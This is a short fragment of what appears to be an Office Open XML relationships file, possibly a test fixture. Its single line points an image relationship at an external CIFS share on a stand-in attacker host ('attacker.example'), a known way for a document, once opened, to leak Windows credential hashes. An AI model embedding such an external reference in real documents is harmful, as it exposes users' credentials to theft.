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cifs://attacker.example/share/logo.png" TargetMode="External"/></Relationships>
</file>